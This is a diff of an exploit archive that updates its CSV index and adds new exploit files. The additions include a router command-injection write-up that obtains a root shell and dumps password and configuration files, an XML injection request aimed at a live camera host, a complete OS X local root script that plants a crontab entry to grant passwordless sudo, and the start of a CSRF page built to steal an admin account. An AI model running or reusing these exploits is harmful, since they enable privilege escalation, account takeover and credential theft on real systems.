 30212,platforms/php/remote/30212.rb,"vBulletin 5 - index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection",2013-12-11,metasploit,php,remote,80
 30213,platforms/php/webapps/30213.txt,"eFront 3.6.14 (build 18012) - Stored XSS in Multiple Parameters",2013-12-11,sajith,php,webapps,0
 30215,platforms/ios/webapps/30215.txt,"Photo Video Album Transfer 1.0 iOS - Multiple Vulnerabilities",2013-12-11,Vulnerability-Lab,ios,webapps,0
-30283,platforms/php/webapps/30283.txt,"SquirrelMail G/PGP Encryption Plug-in 2.0/2.1 - Multiple Unspecified Remote Command Execution Vulnerabilities",2007-07-09,"Stefan Esser",php,webapps,0
+30283,platforms/php/webapps/30283.txt,"SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Multiple Unspecified Remote Command Execution Vulnerabilities",2007-07-09,"Stefan Esser",php,webapps,0
 30216,platforms/cfm/webapps/30216.txt,"FuseTalk <= 4.0 - AuthError.CFM Multiple Cross-Site Scripting Vulnerabilities",2007-06-20,"Ivan Almuina",cfm,webapps,0
 30217,platforms/php/webapps/30217.txt,"Wrapper.PHP for OsCommerce Local File Include Vulnerability",2007-06-20,"Joe Bloomquist",php,webapps,0
 30218,platforms/multiple/remote/30218.txt,"BugHunter HTTP Server 1.6.2 Parse Error Information Disclosure Vulnerability",2007-06-20,Prili,multiple,remote,0
@@ -27594,7 +27594,7 @@ id,file,description,date,author,platform,type,port
 30645,platforms/windows/remote/30645.txt,"Microsoft Windows URI Handler Command Execution Vulnerability",2007-10-05,"Billy Rios",windows,remote,0
 30646,platforms/linux/dos/30646.txt,"Nagios Plugins 1.4.2/1.4.9 Location Header Remote Buffer Overflow Vulnerability",2007-07-16,"Nobuhiro Ban",linux,dos,0
 30647,platforms/php/webapps/30647.txt,"SNewsCMS 2.1 News_page.PHP Cross-Site Scripting Vulnerability",2007-10-08,medconsultation.ru,php,webapps,0
-30648,platforms/linux/dos/30648.txt,"AlsaPlayer 0.99.x - Vorbis Input Plug-in OGG Processing Remote Buffer Overflow Vulnerability",2007-10-08,Erik,linux,dos,0
+30648,platforms/linux/dos/30648.txt,"AlsaPlayer 0.99.x - Vorbis Input Plugin OGG Processing Remote Buffer Overflow Vulnerability",2007-10-08,Erik,linux,dos,0
 30649,platforms/cgi/webapps/30649.txt,"NetWin DNews Dnewsweb.EXE Multiple Cross-Site Scripting Vulnerabilities",2007-10-09,Doz,cgi,webapps,0
 30650,platforms/hardware/remote/30650.txt,"Linksys SPA941 SIP From Field HTML Injection Vulnerability",2007-10-09,"Radu State",hardware,remote,0
 30651,platforms/php/webapps/30651.txt,"Webmaster-Tips.net Joomla! RSS Feed Reader 1.0 - Remote File Include Vulnerability",2007-10-10,Cyber-Crime,php,webapps,0
@@ -28043,7 +28043,7 @@ id,file,description,date,author,platform,type,port
 31151,platforms/linux/local/31151.c,"GKrellM GKrellWeather 0.2.7 Plugin Local Stack Based Buffer Overflow Vulnerability",2008-02-12,forensec,linux,local,0
 31152,platforms/php/webapps/31152.txt,"artmedic weblog artmedic_print.php date Parameter XSS",2008-02-12,muuratsalo,php,webapps,0
 31153,platforms/php/webapps/31153.txt,"artmedic weblog index.php jahrneu Parameter XSS",2008-02-12,muuratsalo,php,webapps,0
-31154,platforms/php/webapps/31154.txt,"Counter Strike Portals 'download' SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0
+31154,platforms/php/webapps/31154.txt,"Counter Strike Portals - 'download' SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0
 31155,platforms/php/webapps/31155.txt,"Joomla! and Mambo com_iomezun Component - 'id' Parameter SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0
 31156,platforms/php/webapps/31156.txt,"Cacti <= 0.8.7 graph_view.php graph_list Parameter SQL Injection",2008-02-12,aScii,php,webapps,0
 31157,platforms/php/webapps/31157.txt,"Cacti <= 0.8.7 graph.php view_type Parameter XSS",2008-02-12,aScii,php,webapps,0
@@ -28509,7 +28509,7 @@ id,file,description,date,author,platform,type,port
 31637,platforms/php/webapps/31637.txt,"W2B Dating Club - 'browse.php' SQL Injection Vulnerability",2008-04-11,The-0utl4w,php,webapps,0
 31638,platforms/windows/remote/31638.txt,"HP OpenView Network Node Manager 7.x - (OV NNM) OpenView5.exe Action Parameter Traversal Arbitrary File Access",2008-04-11,"Luigi Auriemma",windows,remote,0
 31639,platforms/php/webapps/31639.txt,"Trillian 3.1.9 - DTD File XML Parser Buffer Overflow Vulnerability",2008-04-11,david130490,php,webapps,0
-31640,platforms/php/webapps/31640.txt,"osCommerce Poll Booth 2.0 - Add-On 'pollbooth.php' SQL Injection Vulnerability",2008-04-13,S@BUN,php,webapps,0
+31640,platforms/php/webapps/31640.txt,"osCommerce Poll Booth 2.0 AddOn - 'pollbooth.php' SQL Injection Vulnerability",2008-04-13,S@BUN,php,webapps,0
 31641,platforms/java/webapps/31641.txt,"Business Objects Infoview - 'cms' Parameter Cross-Site Scripting Vulnerability",2008-04-14,"Sebastien gioria",java,webapps,0
 31643,platforms/windows/local/31643.rb,"Easy CD-DA Recorder - (PLS File) Buffer Overflow",2014-02-13,metasploit,windows,local,0
 31644,platforms/asp/webapps/31644.txt,"Cezanne 6.5.1/7 - CFLookUP.asp Multiple Parameter XSS",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0
@@ -30689,7 +30689,7 @@ id,file,description,date,author,platform,type,port
 34049,platforms/php/webapps/34049.txt,"Layout CMS 1.0 SQL-Injection and Cross-Site Scripting Vulnerabilities",2010-01-12,Red-D3v1L,php,webapps,0
 34050,platforms/windows/remote/34050.py,"Home FTP Server 1.10.2.143 - Directory Traversal Vulnerability",2010-05-27,"John Leitch",windows,remote,0
 34051,platforms/windows/dos/34051.py,"Core FTP Server 1.0.343 - Directory Traversal Vulnerability",2010-05-28,"John Leitch",windows,dos,0
-34052,platforms/php/webapps/34052.py,"osCommerce Visitor Web Stats Add-On 'Accept-Language' Header SQL Injection Vulnerability",2010-05-28,"Christopher Schramm",php,webapps,0
+34052,platforms/php/webapps/34052.py,"osCommerce Visitor Web Stats AddOn - 'Accept-Language' Header SQL Injection Vulnerability",2010-05-28,"Christopher Schramm",php,webapps,0
 34053,platforms/php/webapps/34053.txt,"ImpressPages CMS 1.0x - 'admin.php' Multiple SQL Injection Vulnerabilities",2010-05-28,"High-Tech Bridge SA",php,webapps,0
 34054,platforms/php/webapps/34054.txt,"GR Board 1.8.6 - 'page.php' Remote File Include Vulnerability",2010-05-30,eidelweiss,php,webapps,0
 34055,platforms/php/webapps/34055.txt,"CMScout <= 2.08 - Cross-Site Scripting Vulnerability",2010-05-28,XroGuE,php,webapps,0
@@ -31416,7 +31416,7 @@ id,file,description,date,author,platform,type,port
 34867,platforms/java/remote/34867.rb,"ManageEngine OpManager / Social IT Arbitrary File Upload",2014-10-02,"Pedro Ribeiro",java,remote,80
 34868,platforms/windows/remote/34868.c,"Phoenix Project Manager 2.1.0.8 DLL Loading Arbitrary Code Execution Vulnerability",2010-10-19,anT!-Tr0J4n,windows,remote,0
 34869,platforms/windows/remote/34869.c,"Cool iPhone Ringtone Maker 2.2.3 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-19,anT!-Tr0J4n,windows,remote,0
-34870,platforms/windows/remote/34870.html,"VLC Media Player 1.1.4 Mozilla Multimedia Plug-in Remote Code Execution Vulnerability",2010-10-19,shinnai,windows,remote,0
+34870,platforms/windows/remote/34870.html,"VLC Media Player 1.1.4 Mozilla Multimedia Plugin - Remote Code Execution Vulnerability",2010-10-19,shinnai,windows,remote,0
 34871,platforms/php/webapps/34871.txt,"eCardMAX FormXP 'survey_result.php' Cross-Site Scripting Vulnerability",2009-07-15,Moudi,php,webapps,0
 34872,platforms/windows/dos/34872.py,"MASS PLAYER 2.1 File Processing Remote Denial of Service Vulnerability",2010-10-19,Sweet,windows,dos,0
 34873,platforms/php/webapps/34873.txt,"Wap-motor 'image' Parameter Directory Traversal Vulnerability",2009-08-27,Inj3ct0r,php,webapps,0
@@ -32466,7 +32466,7 @@ id,file,description,date,author,platform,type,port
 36015,platforms/php/webapps/36015.txt,"Joomla! 'com_community' Component 'userid' Parameter SQL Injection Vulnerability",2011-08-03,"Ne0 H4ck3R",php,webapps,0
 36016,platforms/multiple/remote/36016.txt,"Xpdf 3.02-13 'zxpdf' Security Bypass Vulnerability",2011-08-04,"Chung-chieh Shan",multiple,remote,0
 36017,platforms/php/webapps/36017.txt,"HESK 2.2 Multiple Cross Site Scripting Vulnerabilities",2011-08-03,"High-Tech Bridge SA",php,webapps,0
-36018,platforms/php/webapps/36018.txt,"WordPress WP e-Commerce Plug-in 3.8.6 - 'cart_messages[]' Parameter Cross Site Scripting Vulnerability",2011-08-04,"High-Tech Bridge SA",php,webapps,0
+36018,platforms/php/webapps/36018.txt,"WordPress WP e-Commerce Plugin 3.8.6 - 'cart_messages[]' Parameter Cross Site Scripting Vulnerability",2011-08-04,"High-Tech Bridge SA",php,webapps,0
 36019,platforms/asp/webapps/36019.txt,"Community Server 2007/2008 'TagSelector.aspx' Cross Site Scripting Vulnerability",2011-08-04,PontoSec,asp,webapps,0
 36020,platforms/windows/remote/36020.txt,"Microsoft Visual Studio Report Viewer 2005 Control Multiple Cross Site Scripting Vulnerabilities",2011-08-09,"Adam Bixby",windows,remote,0
 36041,platforms/php/webapps/36041.txt,"Fork CMS 3.8.5 - SQL Injection",2015-02-09,"Sven Schleier",php,webapps,80
@@ -32964,7 +32964,7 @@ id,file,description,date,author,platform,type,port
 36539,platforms/php/webapps/36539.txt,"Advanced File Management 1.4 'users.php' Cross Site Scripting Vulnerability",2012-01-09,Am!r,php,webapps,0
 36540,platforms/php/webapps/36540.txt,"WordPress Age Verification plugin 0.4 'redirect_to' Parameter URI Redirection Vulnerability",2012-01-10,"Gianluca Brindisi",php,webapps,0
 36541,platforms/php/webapps/36541.txt,"PHP-Fusion 7.2.4 'downloads.php' Cross Site Scripting Vulnerability",2012-01-10,Am!r,php,webapps,0
-36542,platforms/windows/remote/36542.txt,"ExpressView Browser Plug-in 6.5.0.3330 - Multiple Integer Overflow and Remote Code Execution Vulnerabilities",2012-01-11,"Luigi Auriemma",windows,remote,0
+36542,platforms/windows/remote/36542.txt,"ExpressView Browser Plugin 6.5.0.3330 - Multiple Integer Overflow and Remote Code Execution Vulnerabilities",2012-01-11,"Luigi Auriemma",windows,remote,0
 36543,platforms/php/webapps/36543.txt,"KnowledgeTree 3.x Multiple Cross Site Scripting Vulnerabilities",2012-01-11,"High-Tech Bridge SA",php,webapps,0
 36544,platforms/php/webapps/36544.txt,"Kayako SupportSuite 3.x Multiple Vulnerabilities",2012-01-11,"Yuri Goltsev",php,webapps,0
 36545,platforms/linux/dos/36545.txt,"Linux Kernel <= 3.1.8 KVM Local Denial of Service Vulnerability",2011-12-29,"Stephan Sattler",linux,dos,0
@@ -34003,7 +34003,7 @@ id,file,description,date,author,platform,type,port
 37666,platforms/php/webapps/37666.txt,"Joomla! Helpdesk Pro Plugin < 1.4.0 - Multiple Vulnerabilities",2015-07-21,"Simon Rawet",php,webapps,80
 37667,platforms/java/remote/37667.rb,"SysAid Help Desk 'rdslogs' Arbitrary File Upload",2015-07-21,metasploit,java,remote,0
 37668,platforms/windows/remote/37668.php,"Internet Download Manager - OLE Automation Array Remote Code Execution",2015-07-21,"Mohammad Reza Espargham",windows,remote,0
-37669,platforms/windows/dos/37669.pl,"Counter-Strike 1.6 'GameInfo' Query Reflection DoS PoC",2015-07-22,"Todor Donev",windows,dos,0
+37669,platforms/windows/dos/37669.pl,"Counter-Strike 1.6 - 'GameInfo' Query Reflection DoS PoC",2015-07-22,"Todor Donev",windows,dos,0
 37670,platforms/osx/local/37670.sh,"OS X 10.10 - DYLD_PRINT_TO_FILE Local Privilege Escalation",2015-07-22,"Stefan Esser",osx,local,0
 37671,platforms/multiple/remote/37671.txt,"Websense Content Gateway Multiple Cross Site Scripting Vulnerabilities",2012-08-23,"Steven Sim Kok Leong",multiple,remote,0
 37672,platforms/php/webapps/37672.txt,"JW Player 'logo.link' Parameter Cross Site Scripting Vulnerability",2012-08-29,MustLive,php,webapps,0
@@ -34656,3 +34656,12 @@ id,file,description,date,author,platform,type,port
 38366,platforms/multiple/webapps/38366.py,"Verax NMS Multiple Method Authentication Bypass",2013-02-06,"Andrew Brooks",multiple,webapps,0
 38367,platforms/php/webapps/38367.txt,"Your Own Classifieds Cross Site Scripting Vulnerability",2013-03-08,"Rafay Baloch",php,webapps,0
 38368,platforms/multiple/remote/38368.txt,"McAfee Vulnerability Manager 'cert_cn' Parameter Cross Site Scripting Vulnerability",2013-03-08,"Asheesh Anaconda",multiple,remote,0
+38369,platforms/hardware/webapps/38369.txt,"Bosch Security Systems Dinion NBN-498 Web Interface - XML Injection",2015-10-01,neom22,hardware,webapps,0
+38370,platforms/hardware/remote/38370.txt,"PIXORD Vehicle 3G Wi-Fi Router 3GR-431P - Multiple Vulnerabilities",2015-10-01,"Karn Ganeshen",hardware,remote,0
+38371,platforms/osx/local/38371.py,"Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation",2015-10-01,rebel,osx,local,0
+38372,platforms/php/webapps/38372.html,"Question2Answer Cross Site Request Forgery Vulnerability",2013-03-01,MustLive,php,webapps,0
+38373,platforms/php/webapps/38373.txt,"WordPress Terillion Reviews Plugin Profile Id HTML Injection Vulnerability",2013-03-08,"Aditya Balapure",php,webapps,0
+38374,platforms/php/webapps/38374.txt,"SWFUpload Multiple Content Spoofing And Cross Site Scripting Vulnerabilities",2013-03-10,MustLive,php,webapps,0
+38375,platforms/php/webapps/38375.txt,"Asteriskguru Queue Statistics 'warning' Parameter Cross Site Scripting Vulnerability",2013-03-10,"Manuel García Cárdenas",php,webapps,0
+38376,platforms/php/webapps/38376.txt,"WordPress podPress Plugin 'playerID' Parameter Cross Site Scripting Vulnerability",2013-03-11,hiphop,php,webapps,0
+38377,platforms/php/webapps/38377.txt,"Privoxy Proxy Authentication Information Disclosure Vulnerabilities",2013-03-11,"Chris John Riley",php,webapps,0

platforms/hardware/remote/38370.txt

@@ -0,0 +1,231 @@
+# Exploit Title: [Vehicle 3G Wi-Fi Router - PIXORD - Multiple
+Vulnerabilities]
+# Date: May 01, 2015 [No response from Vendor till date]
+# Discovered by: Karn Ganeshen
+# Vendor Homepage: [http://www.pixord.com/en/products_show.php?show=17]
+# Version: [Model Name :3GR-431P]
+[Software Version :RTA-A001_02]
+[Wireless Driver Version :2.6.0.0]
+
+*Vehicle 3G Wi-Fi Router - PIXORD *
+http://www.pixord.com/en/products_show.php?show=17
+
+*Device Info *
+
+Model Name :3GR-431P
+Software Version :RTA-A001_02
+Wireless Driver Version :2.6.0.0
+
+PiXORD 3GR-431P 3G Wi-Fi Router is a 3G + GPS + 802.11n (2T2R) wireless
+router. It supports Internet access via 3G and receives position
+information from GPS. 3GR-431P also supports two Ethernet ports for LAN
+connectivity and 802.11n Wi-Fi Access Point for WLAN connectivity.
+
+It is available to install the 3GR-431P on the transportation. The
+passengers can use the laptop or smart phone via Wi-Fi to browse the
+Internet on the go. The Ethernet port also can connect IP camera to provide
+the real time monitoring.
+
+Vulnerability Impact: Easy and full device compromise. Access to configured
+keys, passwords, pass-phrases, accounts, etc. Ability to monitor the user /
+vehicle via camera / connected devices.
+
+*Multiple Security Vulnerabilities *
+
+*1. OS command injection *
+$ telnet 192.168.1.10
+Trying 192.168.1.10...
+Connected to 192.168.1.10.
+Escape character is '^]'.
+Vehicle 3G Wi-Fi Router
+Login: admin
+Password:
+>
+> ?
+mobile3G
+mobileGPS
+model
+reboot
+restoredefault
+version
+
+As seen above, only few specific, functional options are available for
+device management.
+
+However, we can bypass this and dump hashes easily.
+
+> ?;cat /etc/passwd
+sh: ?: not found
+
+admin:<password1>:0:0:Adminstrator:/:/bin/sh
+support:<password2>:0:0:Adminstrator:/:/bin/sh
+user:<password3>:0:0:Adminstrator:/:/bin/sh
+
+> exit
+
+Note that this is also applicable when a non-admin ‘user’ / ‘support’ logs
+in over the Telnet.
+
+The web application lacks strict input validation and hence vulnerable to
+OS command injection attack.
+
+*2. Configuration not secured properly / AuthZ issues *
+
+The device has three users - admin, support, user.
+
+Apparently, there is no separation of privileges between these 3 users,
+when accessing over HTTP(S). All options are available to all three then.
+This allows 'user' /'support' to access device configuration file -
+RT2880_Settings.dat. Configuration backup contains b64-encoded login
+passwords + clear-text WPA keys + other sensitive information.
+
+.. …
+*Sensitive information in configuration file - *
+
+*more RT2880_Settings.dat *
+#The following line must not be removed.
+Default
+WebInit=1
+HostName=pixord
+Login=admin
+Password=<admin_password_here>=
+Login2=support
+Password2=<support_password_here>==
+Login3=user
+Password3=<user_password_here>==
+OperationMode=1
+Platform=RT3352
+.....
+<snip>
+.....
+wan_pppoe_user=pppoe_user
+wan_pppoe_pass=pppoe_passwd
+wan_l2tp_server=l2tp_server
+wan_l2tp_user=l2tp_user
+wan_l2tp_pass=l2tp_passwd
+.....
+<snip>
+.....
+wan_pptp_server=pptp_server
+wan_pptp_user=pptp_user
+wan_pptp_pass=pptp_passwd
+.....
+<snip>
+.....
+DDNS=
+DDNSAccount=<ddns_account_name_here>
+DDNSPassword=<ddns_password_here>
+CountryRegion=
+CountryRegionABand=
+CountryCode=
+BssidNum=1
+SSID1=PiXORD
+WirelessMode=9
+.....
+<snip>
+.....
+WscSSID=RalinkInitialAP
+WscKeyMGMT=WPA-EAP
+WscConfigMethod=138
+WscAuthType=1
+WscEncrypType=1
+WscNewKey=<wsc_key_here>
+IEEE8021X=0
+IEEE80211H=0
+CSPeriod=6
+PreAuth=0
+AuthMode=WPAPSKWPA2PSK
+EncrypType=TKIPAES
+RekeyInterval=3600
+RekeyMethod=TIME
+PMKCachePeriod=10
+WPAPSK1=<WPA_PSK_Key_here>
+DefaultKeyID=2
+Key1Type=0
+Key1Str1=
+Key2Type=0
+Key2Str1=
+Key3Type=0
+Key3Str1=
+Key4Type=0
+Key4Str1=
+WapiPskType=0
+.....
+<snip>
+.....
+WdsEnable=0
+WdsEncrypType=NONE
+WdsList=
+WdsKey=
+WirelessEvent=0
+RADIUS_Server=0
+RADIUS_Port=1812
+RADIUS_Key=
+RADIUS_Acct_Server=
+RADIUS_Acct_Port=1813
+RADIUS_Acct_Key=
+.....
+<snip>
+.....
+wan_3g_apn=public
+wan_3g_dial=*99#
+wan_3g_user=
+wan_3g_pass=
+<snip>
+RADIUS_Key1=<radius_key_here>
+.....
+<snip>
+.....
+
+Also, as observed in point 1 above, all the users have a UID 0, i.e. root
+level privileges to the device:
+
+admin:<password1>:0:0:Adminstrator:/:/bin/sh
+support:<password2>:0:0:Adminstrator:/:/bin/sh
+user:<password3>:0:0:Adminstrator:/:/bin/sh
+
+The application should ideally provide specific privileges to different
+users, and enforce strict access control.
+
+*3. Application does not secure configured passwords (HTTPS) *
+
+Masked password(s) can be retrieved via frame source (inspect element) and
+/ or intercepting request via a proxy.
+
+The application should mask/censure (*****) the passwords, keys and any
+other crucial pieces of configuration and must not pass the values in
+clear-text.
+
+*4. Program / Scripts running in an insecure manner - leaking clear-text
+passwords in process information *
+
+After logging in to the device over Telnet, we can drop in to a shell via
+OS command injection attack described in point 1.
+
+> ?;sh
+sh: ?: not found
+Enter 'help' for a list of built-in commands.
+BusyBox v1.12.1 (2012-12-25 11:48:22 CST) built-in shell (ash)
+
+#
+
+Checking running processes reveal a system program *inadyn*, which
+apparently is a service for ddns connectivity, leaking valid username and
+password in clear-text.
+
+# ps aux
+PID USER VSZ STAT COMMAND
+1 admin 1768 S init
+2 admin 0 RWN [ksoftirqd/0]
+.....
+<snip>
+.....
+2159 admin 1096 S inadyn -u *<ddns-username_here>* -p *<ddns-password_here>*
+ -a *<ddns_domain_here>*
+4050 admin 1768 R ps aux
+
+The programs should be run securely without passing cli arguments and
+parameter values in clear-text.
+-- 
+Best Regards,
+Karn Ganeshen

platforms/hardware/webapps/38369.txt

@@ -0,0 +1,100 @@
+# Exploit Title: Bosch Security Systems - XML Injection - Dinion NBN-498 Web Interface
+
+# Date: 01/09/2015
+
+# Exploit Author: neom22
+
+# Vendor Homepage: http://us.boschsecurity.com
+
+# Data Sheet: http://resource.boschsecurity.us/documents/Data_sheet_enUS_9007201286798987.pdf
+
+# Version: Hardware Firmware 4.54.0026 - Web Interface version is unknown
+
+# Tested on: Windows 8.1 - Firefox 40.0.3
+
+# CVE : CVE-2015-6970 (To be published)
+
+
+#################################################
+#                                                                                                        #
+#    Discovered by neom22                                                           #
+#    23 - 09 - 2015                                                                           #
+#                                                                                                        #
+#################################################
+#
+#
+Bosch Security Systems - Dinion NBN-498 - Web Interface (Live Feed and Administration)
+#
+#
+Vulnerability Discovery: 10/09/2015
+Vendor Contact: 17/09/2015 (no answer)
+Published: 24/09/2015
+#
+#
+
+Description: 
+-----------------------------------------------------------------
+The Dinion2x IP Day/Night camera is a high-performance, smart
+surveillance color camera. It incorporates 20-bit digital signal
+processing and a wide dynamic range sensor for outstanding
+picture performance under all lighting conditons.
+The camera uses H.264 compression technology to give clear
+images while reducing bandwidth and storage requirements. It
+is also ONVIF compliant to improve compatibility during system
+integration.
+The camera operates as a network video server and transmits
+video and control signals over data networks, such as Ethernet
+LANs and the Internet.
+-----------------------------------------------------------------
+
+Useful Links:
+
+Data Sheet: http://resource.boschsecurity.us/documents/Data_sheet_enUS_9007201286798987.pdf
+Documentation: http://resource.boschsecurity.us/documents/Installation_Manual_enUS_2032074379.pdf
+Product: 
+
+http://us.boschsecurity.com/en/us_product/products/video/ipcameras/sdfixedcameras/nbn498dinion2xdaynightipc/nbn498
+
+dinion2xdaynightipc_608
+-----------------------------------------------------------------
+
+XML Parameter Injection POC
+
+_-Request-_
+
+GET /rcp.xml?idstring=<string>injection</string> HTTP/1.1
+Host: postoipiranga.dyndns-ip.com:10004
+User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: HcsoB=60cd4a687de94857
+Connection: keep-alive
+
+_-Response-_
+
+HTTP/1.1 200 OK
+Server: VCS-VideoJet-Webserver
+Connection: keep-alive
+Content-Type: text/xml
+Accept-Ranges: bytes
+Content-Length: 359
+Expires: 0
+Cache-Control: no-cache
+Set-Cookie: HcsoB=60cd4a687de94857; path=/;
+
+<rcp>
+    <command>
+        <hex>0x0000</hex>
+        <dec>       0</dec>
+    </command>
+    <type>T_DWORD</type>
+    <direction>READ</direction>
+    <num>0</num>
+    <idstring><string>injection</string></idstring>
+    <payload></payload>
+<cltid>0x478e</cltid><sessionid>0x00000000</sessionid><auth>1</auth><protocol>TCP</protocol>    <result>
+            <err>0x40</err>
+    </result>
+</rcp>
+ 		 	   		   		 	   		  

platforms/linux/remote/22141.c

@@ -1,8 +1,8 @@
-source: http://www.securityfocus.com/bid/6580/info
+//source: http://www.securityfocus.com/bid/6580/info
 
-A format string vulnerability has been discovered in the Half-Life AdminMod plugin. The problem occurs in commands which call the selfmessage() function, which is used by other functions to write a message to the users console. The format string occurs when the System_Response() function is called by selfmessage() to log the administrative command. An 'rcon' authenticated user may be able to exploit this issue to overwrite sensitive locations in memory.
+//A format string vulnerability has been discovered in the Half-Life AdminMod plugin. The problem occurs in commands which call the selfmessage() function, which is used by other functions to write a message to the users console. The format string occurs when the System_Response() function is called by selfmessage() to log the administrative command. An 'rcon' authenticated user may be able to exploit this issue to overwrite sensitive locations in memory.
 
-Successful exploitation of this issue would allow an attacker to execute arbitrary commands with the privileges of the Half-Life server.
+// Successful exploitation of this issue would allow an attacker to execute arbitrary commands with the privileges of the Half-Life server.
 
 /*****************************************************************
   * hoagie_adminmod.c

platforms/linux/remote/22968.c

@@ -1,8 +1,8 @@
-source: http://www.securityfocus.com/bid/8300/info
+//source: http://www.securityfocus.com/bid/8300/info
 
-Half-Life servers are prone to a buffer overflow that may be exploited by a malicious remote client. The vulnerability occurs because the software fails to sufficiently bounds-check client-supplied data during requests to join multiplayer games. This could allow attackers to execute code in the context of the vulnerable server. 
+//Half-Life servers are prone to a buffer overflow that may be exploited by a malicious remote client. The vulnerability occurs because the software fails to sufficiently bounds-//check client-supplied data during requests to join multiplayer games. This could allow attackers to execute code in the context of the vulnerable server. 
 
-This vulnerability affects the server bundled with Half-Life and the free Dedicated Server for both Windows and Linux operating systems.
+//This vulnerability affects the server bundled with Half-Life and the free Dedicated Server for both Windows and Linux operating systems.
 
 //
 // PRIV8 SECURITY & UHAGr CONFIDENTIAL SOURCE - DO NOT DISTRIBUTE !!!

platforms/linux/remote/22969.c

@@ -1,8 +1,8 @@
-source: http://www.securityfocus.com/bid/8300/info
+// source: http://www.securityfocus.com/bid/8300/info
  
-Half-Life servers are prone to a buffer overflow that may be exploited by a malicious remote client. The vulnerability occurs because the software fails to sufficiently bounds-check client-supplied data during requests to join multiplayer games. This could allow attackers to execute code in the context of the vulnerable server.
+// Half-Life servers are prone to a buffer overflow that may be exploited by a malicious remote client. The vulnerability occurs because the software fails to sufficiently bounds-check client-supplied data during requests to join multiplayer games. This could allow attackers to execute code in the context of the vulnerable server.
  
-This vulnerability affects the server bundled with Half-Life and the free Dedicated Server for both Windows and Linux operating systems.
+// This vulnerability affects the server bundled with Half-Life and the free Dedicated Server for both Windows and Linux operating systems.
 
 /*****************************************************************
  * hoagie_hlserver.c

platforms/multiple/remote/22138.c

@@ -1,10 +1,10 @@
-source: http://www.securityfocus.com/bid/6575/info
+// source: http://www.securityfocus.com/bid/6575/info
 
-The Half-Life StatsMe plug-in is prone to an exploitable buffer overflow condition. This issue may be exploited by an attacker who can authenticate with the rcon-password of the Half-Life server to execute arbitrary code in the context of the server process.
+// The Half-Life StatsMe plug-in is prone to an exploitable buffer overflow condition. This issue may be exploited by an attacker who can authenticate with the rcon-password of the Half-Life server to execute arbitrary code in the context of the server process.
 
-Exploitation may be dependant on which other plug-ins are running on the Half-Life server.
+// Exploitation may be dependant on which other plug-ins are running on the Half-Life server.
 
-Successful exploitation will allow an attacker to gain local and possibly privileged access to the host running the server. 
+// Successful exploitation will allow an attacker to gain local and possibly privileged access to the host running the server. 
 
 /*****************************************************************
   * hoagie_statsme.c

platforms/multiple/remote/22139.c

@@ -1,8 +1,8 @@
-source: http://www.securityfocus.com/bid/6577/info
+//source: http://www.securityfocus.com/bid/6577/info
 
-A format string vulnerability has been discovered in the Half-Life ClanMod plugin. The problem occurs in the 'cm_log' command which is designed to write a message to the server log file. An 'rcon' authenticated user may be able to exploit this issue to overwrite sensitive locations in memory.
+// A format string vulnerability has been discovered in the Half-Life ClanMod plugin. The problem occurs in the 'cm_log' command which is designed to write a message to the server log file. An 'rcon' authenticated user may be able to exploit this issue to overwrite sensitive locations in memory.
 
-Successful exploitation of this issue would allow an attacker to execute arbitrary commands with the privileges of the Half-Life server. 
+// Successful exploitation of this issue would allow an attacker to execute arbitrary commands with the privileges of the Half-Life server. 
 
 /*****************************************************************
   * hoagie_clanmod.c

platforms/multiple/remote/22140.c

@@ -1,10 +1,10 @@
-source: http://www.securityfocus.com/bid/6578/info
+// source: http://www.securityfocus.com/bid/6578/info
 
-The Half-Life StatsMe plug-in is prone to an exploitable format string vulnerability. This issue may be exploited by an attacker who can authenticate with the rcon-password of the Half-Life server to execute arbitrary code in the context of the server process.
+// The Half-Life StatsMe plug-in is prone to an exploitable format string vulnerability. This issue may be exploited by an attacker who can authenticate with the rcon-password of the Half-Life server to execute arbitrary code in the context of the server process.
 
-Exploitation may be dependant on which other plug-ins are running on the Half-Life server.
+//  Exploitation may be dependant on which other plug-ins are running on the Half-Life server.
 
-Successful exploitation will allow an attacker to gain local and possibly privileged access to the host running the server.
+// Successful exploitation will allow an attacker to gain local and possibly privileged access to the host running the server.
 
 /*****************************************************************
   * hoagie_statsme.c

platforms/osx/local/38371.py

@@ -0,0 +1,38 @@
+# CVE-2015-5889: issetugid() + rsh + libmalloc osx local root
+# tested on osx 10.9.5 / 10.10.5
+# jul/2015
+# by rebel
+
+import os,time,sys
+
+env = {}
+
+s = os.stat("/etc/sudoers").st_size
+
+env['MallocLogFile'] = '/etc/crontab'
+env['MallocStackLogging'] = 'yes'
+env['MallocStackLoggingDirectory'] = 'a\n* * * * * root echo "ALL ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers\n\n\n\n\n'
+
+sys.stderr.write("creating /etc/crontab..")
+
+p = os.fork()
+if p == 0:	
+	os.close(1)
+	os.close(2)
+	os.execve("/usr/bin/rsh",["rsh","localhost"],env)
+
+time.sleep(1)
+
+if "NOPASSWD" not in open("/etc/crontab").read():
+	sys.stderr.write("failed\n")
+	sys.exit(-1)
+
+sys.stderr.write("done\nwaiting for /etc/sudoers to change (<60 seconds)..")
+
+while os.stat("/etc/sudoers").st_size == s:
+	sys.stderr.write(".")	
+	time.sleep(1)
+
+sys.stderr.write("\ndone\n")
+
+os.system("sudo su")

platforms/php/webapps/38372.html

@@ -0,0 +1,48 @@
+source: http://www.securityfocus.com/bid/58414/info
+
+Question2Answer is prone to a cross-site request-forgery vulnerability.
+
+Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.
+
+Question2Answer 1.5.4 is vulnerable; other versions may also be affected.
+
+<html>
+<head>
+<title>Exploit for stealing admin's account in Question2Answer. Made by
+MustLive. http://www.example.com</title>
+</head>
+<body onLoad="StartCSRF()">
+<script>
+function StartCSRF() {
+for (var i=1;i<=2;i++) {
+ var ifr = document.createElement("iframe");
+ ifr.setAttribute('name', 'csrf'+i);
+ ifr.setAttribute('width', '0');
